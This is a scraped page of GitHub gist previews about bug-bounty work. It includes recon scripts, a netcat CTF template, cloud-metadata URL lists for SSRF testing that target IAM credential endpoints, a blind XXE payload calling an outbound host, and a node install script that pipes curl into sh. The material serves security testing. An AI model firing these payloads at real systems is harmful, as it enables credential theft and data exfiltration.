Jesse securitybites
xdavidhu
/ converter.sh
Last active
September 1, 2024 10:56
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Converter.sh by @xdavidhu | |
| # This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix | |
| # With this script, you can convert domain lists to resolved IP lists without duplicates. | |
| # Usage: ./converter.sh [domain-list-file] [output-file] | |
| echo -e "[+] Converter.sh by @xdavidhu\n" | |
| if [ -z "$1" ] || [ -z "$2" ]; then | |
| echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]" | |
| exit 1 |
EdOverflow
/ googlegroups.sh
Created
April 5, 2018 14:06
Find a public Google group for a particular host. Some of these groups contain sensitive information. The tool runs against a list of hosts and returns all public groups.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Find a public Google group for a particular host. | |
| # Some of these groups contain sensitive information. | |
| # The tool runs against a list of hosts and returns all public groups. | |
| while read domain; do | |
| if curl -LIs "https://groups.google.com/a/$domain" | grep "overview" > /dev/null; then | |
| echo "[+] https://groups.google.com/a/$domain/forum/#!overview" | |
| fi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # A basic template for solving netcat challenges | |
| # Author: aaron@lintile.com | |
| import socket | |
| import string | |
| class Netcat: | |
| def __init__(self, ip, port): | |
| self.data_buffer = '' | |
| self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
jhaddix
/ cloud_metadata.txt
Last active
October 13, 2025 08:38
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
BuffaloWill
/ cloud_metadata.txt
Last active
October 17, 2025 18:24
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
isaacs
/ node-and-npm-in-30-seconds.sh
Last active
August 23, 2025 10:48
Use one of these techniques to install node and npm without having to sudo. Discussed in more detail at http://joyeur.com/2010/12/10/installing-node-and-npm/ Note: npm >=0.3 is *safer* when using sudo.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo 'export PATH=$HOME/local/bin:$PATH' >> ~/.bashrc | |
| . ~/.bashrc | |
| mkdir ~/local | |
| mkdir ~/node-latest-install | |
| cd ~/node-latest-install | |
| curl http://nodejs.org/dist/node-latest.tar.gz | tar xz --strip-components=1 | |
| ./configure --prefix=~/local | |
| make install # ok, fine, this step probably takes more than 30 seconds... | |
| curl https://www.npmjs.org/install.sh | sh |